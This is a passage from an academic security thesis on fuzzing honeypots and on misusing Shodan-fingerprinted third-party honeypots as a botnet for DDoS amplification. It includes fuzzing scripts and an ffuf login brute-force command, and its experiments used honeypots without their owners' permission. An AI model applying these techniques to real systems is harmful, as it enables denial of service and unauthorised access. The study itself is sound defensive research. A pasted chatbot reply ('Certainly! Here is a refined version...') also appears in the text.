ssh.connect(hostname = IP, port=PORT, username = USER, password =
PASSWORD)
16
17
stdin, stdout, stderr = ssh.exec_command(data)
18
output = stdout.readlines()
19
20
except Exception as e:
21
print("Exception:", e)
22
23
def main():
24
atheris.Setup(sys.argv, fuzz_cowrie)
25
atheris.Fuzz()
Listing 4.1: An example of the python code needed to fuzz the cowrie
The given log from the running Cowrie instance is shown in Listing 4.2, where it can be
seen that an unhandled exception was found by Artheris. This unhandled error could
potentially be exploited by attackers.
1
2024-04-10T13:17:18+0000 [twisted.conch.ssh.session#info] Executing command "b
')\x9a'"
2
2024-04-10T13:17:18+0000 [SSHChannel session (0) on SSHService b'ssh-
connection' on HoneyPotSSHTransport ,15,172.17.0.1] "Unusual execcmd: b')\\
x9a'"
3
2024-04-10T13:17:18+0000 [twisted.conch.ssh.session#critical] Error executing
command "b')\x9a'"
4
Traceback (most recent call last):
5
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/python
/log.py", line 80, in callWithContext
Hardening and misusing honeypots
13
==PAGE:22==
6
return context.call({ILogContext: newCtx}, func, *args, **kw)
7
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/python
/context.py", line 117, in callWithContext
8
return self.currentContext().callWithContext(ctx, func, *args, **
kw)
9
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/python
/context.py", line 82, in callWithContext
10
return func(*args, **kw)
11
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/conch/
ssh/channel.py", line 162, in requestReceived
12
return f(data)
13
--- <exception caught here> ---
14
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/conch/
ssh/session.py", line 98, in request_exec
15
self.session.execCommand(pp, f)
16
File "/cowrie/cowrie -git/src/cowrie/shell/session.py", line 75, in
execCommand
17
self.protocol.makeConnection(processprotocol)
18
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/
internet/protocol.py", line 509, in makeConnection
19
self.connectionMade()
20
File "/cowrie/cowrie -git/src/cowrie/insults/insults.py", line 91, in
connectionMade
21
insults.ServerProtocol.connectionMade(self)
22
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/conch/
insults/insults.py", line 512, in connectionMade
23
self.terminalProtocol.makeConnection(self)
24
File "/cowrie/cowrie -env/lib/python3.11/site-packages/twisted/conch/
insults/insults.py", line 63, in makeConnection
25
self.connectionMade()
26
File "/cowrie/cowrie -git/src/cowrie/shell/protocol.py", line 244, in
connectionMade
27
self.cmdstack[0].lineReceived("; ".join(self.execcmd.split("\n")))
28
builtins.AttributeError: 'HoneyPotExecProtocol' object has no
attribute 'execcmd'
29
30
2024-04-10T13:17:18+0000 [twisted.conch.ssh.session#info] exitCode: 0
Listing 4.2: An unexpected error on a cowrie honeypot when using Atheris
4.4.2
HTTP Request Fuzzing with Boofuzz
In this section, Boofuzz is employed to craft a basic HTTP request, enabling the explo­
ration of potential vulnerabilities in the target application by sending different variations of
the request. The following code snippet, which can be seen in Listing 4.3, demonstrates
how Boofuzz is configured to generate and send these requests.
The fuzzing process was conducted against the latest version of the Glastopf honeypot
(3.1.2). During the fuzzing process, logs from Glastopf were monitored to identify any
anomalies or errors. The results indicated that the honeypot effectively managed all in­
coming requests without recording any critical issues or exceptions.
1
s_initialize(name="Request")
2
with s_block("Request -Line"):
3
s_group("Method", ["GET", "HEAD", "POST", "PUT", "DELETE", "CONNECT", "
OPTIONS", "TRACE"])
4
s_delim(" ", name="space -1")
5
s_string("/index.html", name="Request -URI", max_len=self.max_banner_length
)
6
s_delim(" ", name="space -2")
7
s_string("HTTP/1.1", name="HTTP-Version",max_len=self.max_banner_length)
8
s_static("\r\n", name="Request -Line-CRLF")
14
Hardening and misusing honeypots
==PAGE:23==
9
s_string("Host:", name="Host-Line",max_len=self.max_banner_length)
10
s_delim(" ", name="space -3")
11
s_string("example.com", name="Host-Line-Value",max_len=self.
max_banner_length)
12
s_static("\r\n", name="Host-Line-CRLF")
13
s_static("\r\n", "Request -CRLF")
Listing 4.3: Fuzzing a simple http request
4.4.3
FTP Request Fuzzing with Boofuzz
In this section, Boofuzz is utilized to fuzz the FTP service running on port 21 of a Conpot
honeypot with the latest version (0.6.0). The objective is to generate various usernames
and passwords to attempt logins on the FTP service and observe the honeypot’s behavior.
The code snippet from the fuzzing attempts is shown in Listing 4.4. During the execution
of this script, the Conpot instance encountered resource issues, resulting in unrespon­
siveness. Consequently, accessing the FTP service became impossible while the attack
was ongoing.
1
2
target = Target(connection=TCPSocketConnection("localhost", 21))
3
session = Session(target=target , sleep_time=0)
4
session.auto_free_clear = True
5
6
user = Request("user", children=(
7
String(name="key", default_value="USER",max_len=self.max_banner_length),
8
Delim(name="space", default_value=" "),
9
String(name="val", default_value="anonymous",max_len=self.
max_banner_length),
10
Static(name="end", default_value="\r\n"),
11
))
12
13
passw = Request("pass", children=(
14
String(name="key", default_value="PASS",max_len=self.max_banner_length),
15
Delim(name="space", default_value=" "),
16
String(name="val", default_value="james",max_len=self.max_banner_length),
17
Static(name="end", default_value="\r\n"),
18
))
19
20
session.connect(user)
21
session.connect(user, passw)
22
23
session.fuzz()
Listing 4.4: Fuzzing a simple ftp request
4.4.4
URL and Form Fuzzing with FFuf
In this section, FFuf is utilized to fuzz a running Glastopf honeypot with the latest version
(3.1.2) and a running Conpot honeypot with the latest version (0.6.0). Listing 4.5 shows
the code used to fuzz the URL on a Glastopf honeypot, returning only requests where
the HTTP status code is 200 and the file extension is .php, .html, or .txt. Here a wordlist
is being used. The specific wordlist in this example is a medium sized wordlist that has
been made to discover different URLs on a webpage. This wordlist is set up with the most
common url endpoints [8].
1
ffuf -u http://localhost:80/FUZZ -w SecLists/Discovery/Web-Content/raft-medium
-words-lowercase.txt -e .php,.html ,.txt -r -mc 200
Listing 4.5: An example of fuzzing the URL on a Glastopf honeypot which only returns
where the status is 200 and is in one of these formats .php, .html, .txt
Hardening and misusing honeypots
15
==PAGE:24==
Since the Glastopf instance includes a login form, it was decided to fuzz this as well. In
Listing 4.6, FFuf is used to fuzz a login form on a Glastopf honeypot with different wordlists
for usernames and passwords. In this example, the wordlist for usernames is a small list
of the top usernames, and for passwords, the top 100 common passwords are used [8].
1
ffuf -w SecLists/Usernames/top-usernames -shortlist.txt:W1,SecLists/Passwords/
Common -Credentials/10-million -password -list-top -100.txt:W2 -X POST -d "
login=W1&&password=W2&&submit=Submit" -H "Content -Type: application/x-www-
form-urlencoded" -u http://localhost:80
Listing 4.6: An example of fuzzing the login form on the Glastopf honeypot using a wordlist
for usernames and passwords
An interesting observation from this fuzzing experiment is that Glastopf 3.1.2 accepts all
URLs and allows sign­in with any password and username, which might make the honey­
pot more easily detectable by attackers. In contrast, the Conpot honeypot has only one
endpoint available and does not have any login forms, potentially making it less suscep­
tible to such detection techniques
4.5
Summary
The chapter describes improvements that has been made to the Honeyscanner tool, an
open­source program designed to find vulnerabilities in honeypots. It involves integrating
various honeypot types, such as Glastopf and Conpot, to increase the range of applica­
tions for the tool. Better fuzzing capabilities, which systematically check target systems
for weaknesses, are also emphasized. Many fuzzing methods are investigated, including
coverage­guided, behavioral, and mutation­based fuzzing. Well­known fuzzing libraries
like FFuf, Artheris and Boofuzz have been implemented in the tool. Additionally, a user­
friendly graphical user interface (GUI) has been introduced, significantly simplifying the
tool’s usability.
16
Hardening and misusing honeypots
==PAGE:25==
5
Misuse experiments and evaluation
In this chapter, a series of experiments are conducted to assess the potential for exploiting
honeypots to contribute to misuse attacks. The ethical considerations and experimental
setup are discussed first, followed by an evaluation of the feasibility of executing such
misuse attacks and their potential impact.
5.1
Etichal considerations
The use of honeypots in cybersecurity research demands careful attention to ethical con­
siderations to align with accepted ethical standards and legal regulations. One area pre­
senting significant challenges is the employment of others honeypots in conducting at­
tacks against a web server. Such activities may involve potential ethical and legal con­
cerns, including the necessity of obtaining explicit consent and authorization from the
operators of third­party honeypots, as their use without permission can violate their rights
and misuse their resources.
Therefore in the experiments later in this chapter the ethical consideration will be followed
and efforts will be made to minimize the impact on third­party honeypots, ensuring they
experience no resource constraints or downtime whatsoever.
5.2
Experiment Setup
This section details the experimental setup, including the configuration of the target server,
the methods used to monitor the server, and the techniques employed to identify and
exploit the honeypots.
5.2.1
Target Server
The target server has been configured to simulate a real­life webpage. The following
sections provide a detailed exploration of the target server architecture, including its con­
figuration, performance characteristics, and interactions with its environment. The DTU
server specifications are as follows:
• Processor: 2 CPU cores
• Storage: 48 GB of disk space
• Memory: 8 GB of RAM
• Network Configuration:
– No restrictions on outgoing TCP traffic
– Incoming traffic limited to port 80 (HTTP) and port 443 (HTTPS)
The software configuration of the server is as follows:
• Operating System: Debian 12
• Web Server: NGINX version 1.18.0
• Web Framework: Flask version 1.1.2 on Python 3.9.6
• Application Server: Gunicorn version 20.0.4
Each component of the target server is explained in detail in the following sections, and
a flow chart illustrating the data scheme is provided at the end.
Hardening and misusing honeypots
17
==PAGE:26==
Flask
A basic Flask webpage was established to simulate a real­world webpage.
Flask, a
widely­used Python web framework, is known for its lightweight and adaptable nature,
offering simplicity, flexibility, and ease of use [15]. Flask facilitates the development and
deployment of web applications, APIs, and microservices with minimal boilerplate code.
Its modular design, integrated development server, and robust routing system enable
rapid prototyping and development, making it an effective tool for web application devel­
opment.
Gunicorn
Gunicorn [23] is a lightweight Web Server Gateway Interface (WSGI) HTTP server for
Python web applications [53]. It acts as an intermediary between the web server, NGINX,
and the Python web application framework, Flask, managing incoming HTTP requests
and forwarding them to the application for processing. Gunicorn’s simplicity, ease of use,
and efficiency in handling multiple concurrent connections make it a popular choice for
deploying Python web applications, ensuring a reliable site.
Nginx
To simulate a real­life web page, the Gunicorn server was configured behind a reverse
proxy, with NGINX chosen for this purpose. NGINX [31] is a high­performance, open­
source web server software known for its versatility and efficiency. It functions as a web
server, reverse proxy, load balancer, managing tasks such as serving static content, prox­
ying requests to backend servers, distributing traffic across multiple servers, and caching
content to enhance performance. Nginx excels in handling high volumes of concurrent
connections while consuming minimal system resources, making it a preferred choice for
hosting websites and web applications.
Supervisor
Supervisor [45] is a process control system designed for Unix­like operating systems, en­
abling effective monitoring and management of server processes. It offers a straightfor­
ward yet powerful method to ensure the continuous operation of critical processes, such
as web servers and application servers. Supervisor provides automatic restarts for pro­
cesses that crash or stop unexpectedly, manages process groups, monitors log files, and
controls process priority. Its simple configuration and robust functionality make Supervisor
a popular tool, significantly improving the stability and availability of server applications.
Flow of data
In this section the flow of data will be discussed, from when the server receives a request
until it sends a request back to the user, as shown in figure 5.1.
In Figure 5.1, the data flow is outlined as follows:
1. Nginx listens for incoming HTTP requests from clients and logs them.
2. When a request is received, Nginx forwards it to Gunicorn.
3. Gunicorn then passes the request to the Flask application, which processes it and
generates a response.
4. The response is sent back through Gunicorn to Nginx, which then returns it to the
client.
5. Supervisor continuously monitors the Gunicorn process. If it detects that Gunicorn
has crashed or stopped for any reason, Supervisor can automatically restart it, en­
suring that the Flask application remains available and responsive.
18
Hardening and misusing honeypots
==PAGE:27==
Figure 5.1: Flow chart of the target server
5.2.2
Monitoring targeted server
To monitor the targeted server a separate endpoint on the server was set up and the
ELK stack was implemented to monitor the server performance. The ELK stack is a
powerful set of open­source tools that provide end­to­end data processing, search, and
visualization capabilities [12]. The components in this stack work together to process,
store, and visualize data. In the following sections each component of the ELK stack is
explained
Elasticsearch
Elasticsearch is a distributed search and analytics engine optimized for handling large
volumes of data efficiently [11]. It supports full­text search, structured search, and analyt­
ics capabilities. In this project, Elasticsearch functions as the central data repository for
logs, offering indexing, searching, and analytical tools to manage and analyze the data
effectively.
Kibana
Kibana [26] is a data visualization and analysis tool that interfaces with Elasticsearch. It
enables the creation of dashboards, visualizations, and reports based on data stored in
Elasticsearch. In this project, Kibana facilitates the interaction of the data from Elastic­
search. It allows for the creation of visualizations and dashboards to monitor logs and
derive insights, thereby improving the ability to analyze the data effectively.
Excluding logstash
In most ELK stack implementations, Logstash is employed for advanced data transforma­
tions and filtering between data sources and Elasticsearch [28]. However, in this project,
the need for complex data manipulation was minimal, rendering Logstash unnecessary.
Instead, Filebeat was selected to directly ship logs to Elasticsearch. This decision stream­
lined the stack, creating a more direct data pipeline, and reduced complexity and potential
points of failure.
Filebeat
Filebeat [14] is a lightweight log shipper that collects log data from specified files and
forwards it to Elasticsearch. In this project, Filebeat is responsible for collecting logs from
NGINX. These logs are sent to Grok for parsing before being forwarded to Elasticsearch
Hardening and misusing honeypots
19
==PAGE:28==
for indexing and analysis.
Grok
Grok [22] is a powerful pattern matching tool commonly used alongside log shippers like
Filebeat or Logstash to parse unstructured log data into structured formats. It provides a
method to extract and parse log lines into meaningful fields, thereby making the data more
readable and easier to analyze. An example of this can be seen in Listing 5.1,where a
request is sent to the server prior to applying the Grok pattern By utilizing Grok patterns,
relevant information can be extracted, such as setting event.request_length to 536, as
demonstrated in Listing 5.2. This makes it possible to visualize request sizes and other
relevant metrics.
1
130.225.68.58 - - [16/May/2024:11:39:35 +0200] "GET / HTTP/1.1" 200 24 "-" "
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like
Gecko) Chrome/124.0.0.0 Safari/537.36" 536 186
Listing 5.1: A request being sent to server before being parsed trough a grok processor
1
"host.ip": "130.225.68.58"
2
"http.request.method": "GET"
3
"url.original": "/"
4
"http.request.length": 536
Listing 5.2: A request after being parsed in a grok processor
5.2.3
Fingerprinting honeypots
Shodan is a powerful search engine that allows users to discover and explore connected
devices and services on the internet. Shodan makes it possible to search for devices
based on various criteria, including geographic location, device type, open ports, and
specific vulnerabilities. Unlike traditional search engines, Shodan focuses on indexing
information about internet­connected devices, providing insights into the global internet
infrastructure and potential security risks [38].
One notable feature provided by Shodan is its ability to tag deployed honeypots, enabling
users to locate and analyze these decoy systems effectively. This functionality makes
Shodan an invaluable tool for researchers aiming to identify and examine honeypots for
testing or analytical purposes. By leveraging Shodan’s tagging capability, researchers
can efficiently find honeypots that are configured to mimic specific services.
For example, the following query in Listing 5.3 can be used to search for deployed honey­
pots on port 22. This query retrieves information about 40 deployed honeypots configured
to simulate SSH services on port 22.
1
product:"Honeypot" port:"22"
Listing 5.3: Search query to find honeypots on port 22
Another method for identifying honeypots is through searching for their distinctive char­
acteristics on Shodan. For instance, the Conpot honeypot is often simulated as ’Siemens
Simatic S7­200’ systems. By searching for ’Siemens Simatic S7­200’ on Shodan, 538 re­
sults were obtained. However, it is important to note that some of these may be legitimate
systems, as this search term can match real industrial control systems.
It’s interesting to note that Shodan also clearly tags some honeypots as Conpot, enabling
users to search for Conpot honeypots directly. 242 results for this particular search, which
more accurately represents Conpot deployments.
20
Hardening and misusing honeypots
==PAGE:29==
Additionally, Shodan offers a service called Honeyscore, which returns the probability
that a given IP address corresponds to a honeypot [39]. Although still a work in progress,
Honeyscore provides valuable insights for fingerprinting honeypots.
it is important to note that the methods described above represent only a small subset
of the total deployed honeypots and constitute just one approach to discovering them.
Given the ethical considerations surrounding this research, the honeypots identified us­
ing Shodan will be used for the experiments conducted in this study. These identified
honeypots provide a controlled and representative sample for evaluating the potential im­
pact of a misuse attack on a fingerprinted honeypot.
5.3
Evaluation Metrics
The primary metric to be examined in this study is the request_length, which is defined as
the size of the request, including the request line, header, and request body [Source32].
By examining this metric, the total size of the incoming request can be determined, ranging
from a few bytes to several hundred kilobytes. This provides an overview of the server’s
capacity to handle various request sizes.
To ensure the accuracy of the logging parameters, preliminary experiments were con­
ducted using Lorem Ipsum text. This approach involved generating a specific amount of
Lorem Ipsum text to serve as a controlled payload. For instance, 100,000 bytes (approx­
imately 100 KB) of Lorem Ipsum text were generated and sent as an attachment to the
server. By monitoring the endpoint, it was verified that the server received 100,771 bytes.
This verification process confirmed that the server’s logging mechanism accurately cap­
tured the intended data, thereby validating the integrity of our experimental setup before
proceeding with further experiments.
By utilizing request_length as a key logging parameter, the following questions will be
addressed to assess the success of the misuse attacks.
5.3.1
Misuse attack
• Is it possible to connect to the honeypot and excecute the given wget/curl request?
• How much distress did the following command generate on the targeted server?
• Are there different http methods that will generate a bigger request size?
5.3.2
Botnet misuse attack
• Is it possible to connect to multiple honeypots and send wget/curl commands to the
target?
• Are the experiments conducted ethically?
• How much distress did the following command generate on the targeted server?
By answering these questions, the experiments will provide a thorough evaluation of how
effective and damaging misuse attacks can be on the targeted servers and/or on the
honeypots.
5.4
Evaluation
This chapter presents a comprehensive evaluation of the misuse attacks. A series of
experiments were conducted to assess the feasibility and impact of these attacks. The
evaluation explores various methods of misusing honeypots, ranging from sending simple
curl/wget commands from a honeypot to executing more advanced misuse attacks involv­
ing multiple requests per honeypot. Additionally, the chapter examines a botnet misuse
Hardening and misusing honeypots
21
==PAGE:30==
attack, where a attack orchestrator connects to multiple honeypots simultaneously and
sends requests to the target server. This approach simulates a realistic scenario, putting
significant pressure on the target server.
By conducting these experiments, the potential severity of an attack can be clearly out­
lined. This involves observing the precise flaws and vulnerabilities that attackers might
exploit by replicating real­world circumstances. Through these experiments, it becomes
possible to understand the potential damage and the defensive capabilities required to
mitigate such threats.
5.4.1
Baseline
Before initiating the experiments, preliminary observations were made by simply open­
ing the web server in a browser. This action alone, which involves making a basic GET
request to retrieve the webpage, generated 536 bytes being sent to the server. This
request includes headers and metadata necessary for loading the page. An interest­
ing observation during these baseline experiments was that Google Chrome generated
a larger request size compared to Microsoft Edge and Mozilla Firefox, which produced
approximately 430 and 450 bytes.
However, these baseline request sizes represent typical everyday use of the webpage
and are therefore insufficient for creating a misuse attack. Consequently, the following
sections will explore various methods to increase the size of the requests.
5.4.2
Misuse attack
This section explores different methods of sending requests from the honeypot to the
target server. It also examines various request sizes that will be used in subsequent
experiments targeting the servers.
Wget vs Curl requests
Certainly! Here is a refined version of the paragraph to make it more suitable for inclusion
in a thesis:
To begin the experiments, it was necessary to select a command­line tool for sending
requests from the honeypot to the targeted server. Two tools were considered for this
purpose: wget [51] and curl [6]. Although both tools have similar functionalities, curl
is generally easier to use and offers more features. Additionally, wget stores request
information on the honeypot, making it more resource­intensive. Therefore, given the
ethical considerations, curl will be used in the botnet attacks due to its lower resource
consumption on the honeypots.
To validate the similarities between both tools, experiments comparing their performance
were conducted using a PowerShell terminal sending the given commands in appendix
A.1 with different methods, such as GET, POST, PUT, TRACE, and CONNECT, along with
different headers and data. The experiments confirmed that requests are sent in a similar
manner by both tools.
Different ways of constructing the requests
In this experiment, different request sizes will be examined. The request sent in the previ­
ous section 5.4.2 will now be used on a Cowrie honeypot running the latest version (2.5.0)
with a default configuration.
The purpose of this experiment is to observe how large of a request can be generated by
sending a curl request from the honeypot to the target server, which will then be used for
a misuse attack later on.
22
Hardening and misusing honeypots
==PAGE:31==
Initial attempts involved sending simple curl requests using different HTTP methods. How­
ever, it was discovered that the Cowrie honeypot serialized these requests, stripping them
of their metadata and converting them into simple GET requests. This behavior was con­
firmed by observing a consistent logged size of 134 bytes on the server side. Similarly,
when using wget, the target server logs indicated the requests originating from curl version
7.38.0, which was the same version used for sending the curl requests. This unexpected
behavior suggests that both tools were processed similarly by the Cowrie honeypot, re­
sulting in uniform request logging.
To further investigate, the experiment shifted now more towards embedding data within
the URL, trying to bypass the serialisation of the Cowrie honeypot. A Python script was
developed to connect to honeypots and generate long URL links. The script, detailed in
Appendix A.2, includes the function get_lorem_ipsum_text, which produces text based on
the desired number of paragraphs and parses it using the urllib library [49]. This method
overcomes the issue of Cowrie serializing the request, allowing for the generation of larger
requests. However, limitations imposed by the Nginx server is now being encountered, as
it enforces a maximum request URI size of 8Kb [32]. Despite this constraint, which results
in relatively small request sizes, a substantial number of compromised devices will then
be necessary to achieve a successful attack.
Multiple connections to the same honeypot
Since sending a single request from the honeypot generates a minimal amount of traffic,
a new approach was explored. This involved opening multiple connections to the honey­
pot and sending requests from each connection. For instance, if 10 connections can be
opened simultaneously to the same honeypot and a request is sent from each connection,
a significant amplification of the request size being sent to the server would be achieved.
The python script in Appendix A.2, where then extended to be able to handle such an
experiment.
The experiment was conducted against a locally running Cowrie honeypot (version 2.5.0)
with default configurations. The testing began by opening 5 connections to the honeypot
and incrementally increasing the number of connections to 10, 20, 30, 40, and 50. At
50 connections, the local machine started to struggle, leading to the conclusion of the
experiments. The results confirmed that the number of requests indeed followed a linear
pattern. Figure 5.2 illustrates the potential amplification of the total request size.
The figure shows that data amplification increases rapidly with the number of connections.
However, this experiment highlights a significant challenge, it requires a large number of
fingerprinted honeypots, which might be hard to find.
To address this issue, the next section will take the experiment a step further by con­
necting to multiple honeypots at the same time and opening multiple connections to each
honeypot.
Hardening and misusing honeypots
23
==PAGE:32==
Figure 5.2: Total Data Size for multiple connections to the same Honeypot
5.4.3
Botnet misuse attack
In this experiment, the scope will be expanded beyond the previous experiment. In the
earlier experiments, a Python script was used to generate and send requests to the hon­
eypot. Given the need to connect to a large number of honeypots in this experiment, a
programming language capable of handling a higher degree of concurrency is required.
Therefore, the next experiments will use a Go [20]. Go is specifically designed to handle
tasks requiring high concurrency and is therefore better suited for this purpose [21].
The attack orchestrator which will be the main part of this attack, the code can be seen
in the Appendix A.3. The code works so that it takes a list of honeypots and splits each
of the lines into their given field to create a SSH client with the given values. It then
starts iterating trough each SSH client and connects to each ssh client and executes the
curl command at simultaneously at specified intervals. A schema of the intended attack
scenario can be seen in figure 5.3.
Figure 5.3: Intended attack scenario
Initially, each honeypot will be connected to once, and the curl command will be executed
every 5 seconds to avoid overwhelming the honeypots. Since the honeypots are not
owned by me nor do i have written permission from their owners, this experiment will be
conducted minimally to remain within ethical boundaries. An assumption will be made
that the number of requests will increase linearly with the number of honeypots.
From earlier experiments, it was determined that one request to a honeypot using the long
24
Hardening and misusing honeypots
==PAGE:33==
URL method generates approximately 7 KB of data. To begin, an attempt will be made to
connect to five fingerprinted honeypots simultaneously, sending one request from each
honeypot. By observing the targeted server, it was noted that the monitoring service
logged 34,968 bytes (approximately 35 KB).
To advance the experiment, ten fingerprinted honeypots were connected simultaneously,
each sending one request to the target service. The monitoring service logged 69,974
bytes (around 70 KB). This observation supports the assumtion that the total data size
increases linearly with the number of honeypots.
Due to ethical considerations, the experiment was not extended to include more honey­
pots. However, in Figure 5.4, a plot was generated to show the expected total data size
as the number of honeypots increases. The linear graph demonstrates that with around
25,000 honeypots, the total data size reaches the scale of gigabytes (GB), where 1 GB
equals 1,000,000,000 bytes.
This projection indicates that the potential impact of the attack becomes significantly more
serious as the number of participating honeypots increases.
Figure 5.4: Relationship between number of honeypots and total data size under various
amplification factors
In the remaining plots in Figure 5.4, the experiment is expanded by sending multiple re­
quests from each honeypot. The amplification factors of 10, 100, and 500 are used to
illustrate the potential total data size. These plots range from 0 to 180,000 honeypots, re­
flecting the scale of the largest reported DDoS attack. In 2020, Google reported a DDoS
attack that peaked at 2.4 terabits per second (Tbps) by compromising 180,000 servers to
send large requests to Google’s services [30].
The attacks might not reach the levels observed by Google, but it is clear that a misuse
attack like this can scale rapidly. Plot 4, it is shown that with 180,000 honeypots, each
having 500 connections, the total data size could reach 600GB, or 0.6Tb. While achieving
180,000 fingerprinted honeypots might be unlikely, the research ”Gotta Catch ’Em All: A
Multistage Framework for Honeypot Fingerprinting” by Srinivasa et al. [43] indicates there
are 18.65 million SSH services running on the internet, and around 4,000 of these services
were detected as honeypots(such as Kippo and Cowrie).
Hardening and misusing honeypots
25
==PAGE:34==
The capacity of these honeypots to handle 500 connections simultaneously depends on
their configuration and the capabilities of the servers they run on. However, since these
services are often designed to handle DDoS attacks, it is reasonable to assume they can
sustain a high number of connections concurrently.
The experiment successfully illustrated how to build a large botnet DDoS attack using
already fingerprinted honeypots and existing technologies. By using this its possible to
make alot of distress against the targeted services. The findings suggest that while achiev­
ing the scale of the largest DDoS attacks, such as the 2.4 Tbps attack on Google, might be
challenging, the scalability of this approach can still inflict considerable distress towards
the targeted server.
5.5
Summary
In this chapter, a series of experiments were conducted to evaluate the efficiency of dif­
ferent configurations involving honeypots in the context of Distributed Denial of Service
(DDoS) attacks.
Initial experiments were focused on understanding the basic request sizes and methods
to send requests from honeypots to the target server. Wget and curl were compared for
this purpose, with curl ultimately being selected due to its efficiency and lower resource
consumption. Further experiments explored constructing larger requests by embedding
data within URLs, overcoming the limitations imposed by the Cowrie honeypot’s serializa­
tion of requests. Although constrained by server­side limits, the potential for significant
amplification by sending multiple requests from each honeypot was demonstrated in these
experiments.
The most impactful experiment involved orchestrating a botnet misuse attack using a
Go script to manage multiple concurrent connections to various fingerprinted honeypots.
Requests were sent at regular intervals to simulate a scalable DDoS attack. Although
constrained by ethical considerations, the experiments demonstrated a linear increase
in total data size with the number of honeypots and requests, highlighting the potential
severity of such attacks. The results indicate that with a sufficient number of compromised
honeypots, a large­scale DDoS attack could be executed.
26
Hardening and misusing honeypots
==PAGE:35==
6
Conclusion and future work
This thesis has explored a new and unconventional approach to utilizing fingerprinted hon­
eypots as botnets in Distributed Denial of Service (DDoS) attacks, shedding light on both
the vulnerabilities and potential improvements of these cybersecurity tools. By examining
ways to exploit honeypots, the research aimed to improve vulnerability scanners, specifi­
cally the Honeyscanner tool, through the integration of advanced fuzzing techniques and
support for a broader range of honeypot types and implementing an intuitive graphical
user interface (GUI).
The findings demonstrate that while honeypot misuse, particularly through fingerprint­
ing, is a known issue, leveraging these fingerprinted honeypots for larger­scale attacks
presents a previously unexplored threat. Various methods for utilizing fingerprinted hon­
eypots in DDoS attacks were assessed, and the potential impact of these methods was
evaluated through a series of experiments. These experiments highlighted the feasibil­
ity and risks associated with such misuse, emphasizing the need for more robust and
resilient honeypots.
The research detailed the process of using tools like curl and wget to send requests from
honeypots to a target server, simulating a DDoS attack. The experiments highlighted
that even a relatively small number of honeypots could generate substantial traffic, and
as the number of honeypots increases, the potential for disruption grows exponentially.
This was particularly evident in scenarios where multiple honeypots were orchestrated
to send requests simultaneously, resulting in significant data flow and potential server
overload. Some ways to mitigate some of these risks is to not use default configurations
by for example using SBOM when distrubuting the honeypots and by always keeping the
honeypots up to date with the latest patches and updates.
Improvements to the Honeyscanner tool were a key focus of this research. By integrating
advanced fuzzing tools like Boofuzz, Atheris, and FFuf, and expanding support to include
additional honeypots such as Glastopf and Conpot, the tool’s effectiveness in detecting
and mitigating vulnerabilities was significantly enhanced. The development of a user­
friendly GUI further improved the tool’s accessibility and usability, making it a valuable
asset.
The insights gained from this research contribute to the broader field of cybersecurity by
providing a deeper understanding of honeypot vulnerabilities and their potential exploita­
tion. The improved Honeyscanner tool offers a practical solution for improving honeypot
security, thereby strengthening overall cybersecurity defenses.
6.1
Future work
The research presented in this thesis opens up several directions for further exploration
and development. While significant advancements have been made in understanding
and enhancing the security of honeypots, particularly through the misuse of fingerprinted
honeypots and the improvement of the Honeyscanner tool, there remain numerous op­
portunities to expand upon these findings. This section outlines potential directions for
future work, focusing on further research into misuse attacks and improvements to the
Honeyscanner tool.
Hardening and misusing honeypots
27
==PAGE:36==
6.1.1
Further Research on Misuse Attacks
This thesis has explored a new way of using honeypots as part of a botnet attack. Since
this is a new approach, there are several ways to expand these experiments to better
understand the potential impact these attacks might have.
• Larger scale misuse attack: In this thesis, a relatively small number of honeypots
were used to draw conclusions. Future work could involve conducting experiments
on a much larger scale, utilizing hundreds or even thousands of honeypots to better
understand the amplification potential and overall impact on targeted systems.
• Use of other honeypot configurations: Explore the effects of using various honey­
pot configurations and types. Assess how each configuration impacts the ability of
attackers to misuse honeypots for launching attacks.
• Examine other ways to send the requests: In this thesis the experiments have used
a method of generating large URL strings using nonsense text. A next step would
be to investigate other ways of constructing the request URL.
Slowlaris attack
Exploring other types of attacks, such as the Slowloris attack. Slowloris is a low­and­slow
attack that targets web servers by holding multiple connections open and sending partial
requests, which exhausts the server resources. [40]
Future work should include detailed experiments to measure the impact of Slowloris at­
tacks when launched from compromised honeypots. This involves identifying the thresh­
olds at which such attacks cause major disruptions and evaluating how effectively they
can impair the target system’s functionality. By doing so, a better understanding of the
potential severity of misuse attacks utilizing Slowloris can be achieved.
6.1.2
Improvements to the Honeyscanner Tool
This thesis has improved the functionality of the Honeyscanner tool by incorporating addi­
tional fuzzing algorithms, integrating Conpot and Glastopf honeypots, and implementing a
basic graphical user interface (GUI). However, several potential directions for future work
could further improve the tool’s functionality and usefulness. These include:
• Integration of Additional Honeypot Types: Expanding the range of honeypots sup­
ported by the Honeyscanner tool to cover a broader spectrum of potential threats.
• Exploration of advanced attack techniques: Investigating more sophisticated attack
methods to better understand and anticipate evolving security challenges.
• Improvement of the GUI: Continue improving the graphical user interface to provide
a more intuitive and user­friendly experience, facilitating easier interaction with the
tool.
28
Hardening and misusing honeypots
==PAGE:37==
Bibliography
[1]
Atheris. URL: https://github.com/google/atheris.
[2]
Checkmarx. May 2024. URL: https://checkmarx.com/.
[3]
Aristofanis Chionis Koufakos. “A vulnerability analyzer for Honeypots”. eng. 2023.
[4]
Conpot. Conpot. URL: http://conpot.org/.
[5]
Cowrie. URL: https://github.com/cowrie/cowrie.
[6]
Curl. URL: https://curl.se/.
[7]
CVE. URL: https://cve.mitre.org/.
[8]
Danielmiessler. SecLists. URL: https://github.com/danielmiessler/SecLists.
[9]
Desaster/Kippo: Kippo ­ SSH honeypot. URL: https://github.com/desaster/kippo.
[10]
Dionaea. URL: https://github.com/DinoTools/dionaea.
[11]
Elasticsearch. URL: https://www.elastic.co/elasticsearch.
[12]
ELK stack. URL: https://www.elastic.co/elastic-stack.
[13]
Ffuf. GitHub ­ ffuf/ffuf: Fast web fuzzer written in Go. URL: https://github.com/ffuf/
ffuf.
[14]
Filebeat. URL: https://www.elastic.co/beats/filebeat.
[15]
Flask. URL: https://flask.palletsprojects.com/en/3.0.x/.
[16]
Fuzzingbook. Mutation­Based Fuzzing ­ The Fuzzing Book. URL: https://www.
fuzzingbook.org/html/MutationFuzzer.html.
[17]
